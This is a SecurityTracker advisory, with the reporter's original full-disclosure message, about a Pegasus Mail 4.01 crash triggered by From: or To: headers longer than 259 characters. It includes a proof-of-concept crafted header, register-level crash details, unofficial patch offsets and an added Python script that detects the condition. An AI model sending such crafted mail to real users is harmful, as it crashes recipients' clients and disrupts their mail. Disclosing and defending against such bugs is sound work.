Pegasus Mail Bug in Processing 'From' and 'To' Headers Lets Remote Users Send Mail to Crash the Recipient's Pegasus Mail Client
|
SecurityTracker Alert ID: 1004826
|
CVE Reference: CAN-2002-1075
|
Updated: Jan 21 2004
|
Original Entry Date: Jul 24 2002
|
Impact: Denial of service via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 4.01
|
Description: A denial of service vulnerability was reported in Pegasus Mail. A remote user can send a specially crafted e-mail message to the
target (victim) user to cause the target user's e-mail client to crash when checking for new mail or when viewing a message.
It is reported that a remote user can place more than 259 characters in either the SMTP "From:" or "To:" mail headers to cause the
recipient's Pegasus Mail client to crash.
A demonstration exploit mail header is shown below:
From: myname <250'A's>
To: test@localhost
Subject: Good crash
According to the report, the client will crash when checking for new mail or when viewing the affected message. The
recipient may have to manually delete the message before the client will properly reopen. The mail client may also crash when the
recipient attempts to delete the message from the trash.
The author of the report has provided a demonstration exploit and an
unofficial patch in the Source Message (in a Base64-encoded zip file).
The vendor has reportedly been notified.
|
Impact: A remote user can send mail to cause the recipient's mail client to crash.
|
Solution: The vendor has since released a fix [fixed several versions prior to the current version at the time of this Alert modification --
4.12a], available at:
http://www.pmail.com/downloads.htm
The author of the report has provided a temporary and unofficial
patch, available in the Source Message (in a Base64-encoded zip file).
[Editor's note: Your anti-virus software may detect the
exploit in the zip file as a virus.]
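A defensive check for the condition described above, as an added example (not part of the original alert or the reporter's attachment): it scans a raw message and reports any From: or To: header whose value exceeds 259 characters. The function names and the decision to count folded continuation lines as part of the value are assumptions; the page does not say how Pegasus Mail treats folded headers.

```python
import re

LIMIT = 259               # advisory: longest From:/To: value handled safely
WATCHED = ("from", "to")  # the two headers the advisory names

def unfold(raw: bytes):
    """Yield (name, value) for each header, joining folded lines.

    Only the header block (everything before the first empty line) is
    read, so long lines in the body are never counted.
    """
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    name, value = None, b""
    for line in re.split(rb"\r?\n", head):
        if name is not None and line[:1] in (b" ", b"\t"):
            value += line          # folded continuation of the same header
            continue
        if name is not None:
            yield name, value
        name, sep, value = line.partition(b":")
        if not sep:                # not a "Name: value" line, ignore it
            name = None
    if name is not None:
        yield name, value

def oversized_headers(raw: bytes, limit: int = LIMIT):
    """Return [(header, length)] for watched headers longer than limit.

    Length is counted after the colon, leading space included, the same
    way the advisory counts its 260-character example.
    """
    hits = []
    for name, value in unfold(raw):
        key = name.strip().lower().decode("ascii", "replace")
        if key in WATCHED and len(value) > limit:
            hits.append((key, len(value)))
    return hits

def constructed_message(fill: int) -> bytes:
    """Constructed sample shaped like the advisory's demonstration header."""
    return (b"From: myname <" + b"A" * fill + b">\r\n"
            b"To: test@localhost\r\n"
            b"Subject: Good crash\r\n\r\nbody\r\n")

if __name__ == "__main__":
    for fill in (249, 250):
        print(fill, oversized_headers(constructed_message(fill)))
```

A gateway or pre-delivery filter can quarantine messages for which `oversized_headers` returns a non-empty list while clients are still on 4.01.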
|
Vendor URL: www.pmail.com
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: Auriemma Luigi <bugtest@sitoverde.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 24 Jul 2002 21:51:09 +0000
From: Auriemma Luigi <bugtest@sitoverde.com>
Subject: Pegasus mail DoS
|
--------------Boundary-00=_9PWRUG9D5S1232HA1OBB
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
######################################################################
Application: Pegasus mail (http://www.pmail.com)
Version: 4.01 and possibly previous
Bug: Bad management of "From:" and "To:" mail headers
Risk: DoS and in some cases the client cannot be opened until
the user has cancelled the saved mail in the mail
folder
Author: Auriemma Luigi (e-mail: bugtest@sitoverde.com)
######################################################################
Sections:
1) Introduction
2) Bug
3) The Code
4) Fix
5) Philosophy
----------------------------------------------------------------------
1) Introduction
Pegasus mail seems to be a diffused free mail client for Windows (32
and 16 bit) and DOS.
The version I have tested is the latest at this moment: 4.01 for
Win32.
The OS used to do the test is Win98SE (so something can differ a bit
for those who have NT/2K/XP or others).
Naturally I have contacted all the support mail addresses specified
in the program but I have received no answers, so there is no
official fix available.
However this is not a big problem because an advisory is also useful
to keep the attention of the vulnerable program's author.
----------------------------------------------------------------------
2) Bug
The bug is in the management of the headers "From:" and "To:" that
are in the mail received.
Pegasus mail can manage a maximum of only 259 chars in these two fields,
so the problem is when an attacker sends some more characters.
For example, the following is a proof-of-concept mail:
/*mail*/
From: myname <250'A's>
To: test@localhost
Subject: Good crash
You cannot see this text 8-)
/*end_mail*/
(the 260 chars are counted after "From:" so we have " myname <" +
250 'A's + ">" = 260, and with the "To:" header is identical)
Now there are some different results about the crash of the program,
and this seems to be caused by our activated program options.
It can crash when we want to open the mail, or it will crash just
when we want to check our mails, and the great problem is when we
reopen the client, because the mail is cached in the user mail
folder so the problem continues until he deletes this bad
mail.
Another problem is that the malformed mail seems to be
undeletable from the program, because when you want to delete it
from the trash Pegasus crashes again.
So after moving the mail to the trash, restart the program so it
deletes the mail automatically without crashing.
Now I want to show what the errors are (yes we get 2 errors, one
after the other), and the different situations for the field we
want to exploit:
"From:"
The first error happens when the EIP reaches 0x004157c0 and the
exploited header has filled the EDX register.
"To:"
The first error happens when the EIP reaches 0x004c668c and the
exploited header has filled the EAX and EDI registers.
The second happens in Kernel32.dll at EIP 0xbffc04d4.
----------------------------------------------------------------------
3) The Code
In the attachment you can find:
a) a little proof-of-concept to send a mail with the "From:" field
oversized.
The source code and the exe are for Win.
b) a patcher for the version 4.01 of the program that uses my personal
and unofficial fix (useful if someone doesn't know how to use a hex
editor).
c) an Italian version of this advisory.
----------------------------------------------------------------------
4) Fix
No official patch.
See the Pegasus mail site (http://www.pmail.com) for updates.
I have done a PERSONAL and NOT OFFICIAL fix for the version 4.01:
File: winpm-32.exe
address value
14DC3 90
14DC4 90
14DD7 90
14DD8 90
The NOP trick runs well and it seems that all the functions are OK,
but remember that it is only temporary!
----------------------------------------------------------------------
5) Philosophy
I'm really hopeful about the FULL-DISCLOSURE, because with that
"everyone" can know the real effects of an attack, the real danger of
a bug, someone can learn a bit of programming (I have learned a bit of
C from the source code of some exploits) and it's useful for all the
people that are hopeful in this type of disclosure.
No secrets!
----------------------------------------------------------------------
Any type of feedback is really welcome!
Byez
--------------Boundary-00=_9PWRUG9D5S1232HA1OBB
Content-Type: application/x-zip;
name="pegasus.zip"
Content-Transfer-Encoding: base64
Content-Description: Advisory, proof-of-concept and my fix
Content-Disposition: attachment; filename="pegasus.zip"
--------------Boundary-00=_9PWRUG9D5S1232HA1OBB--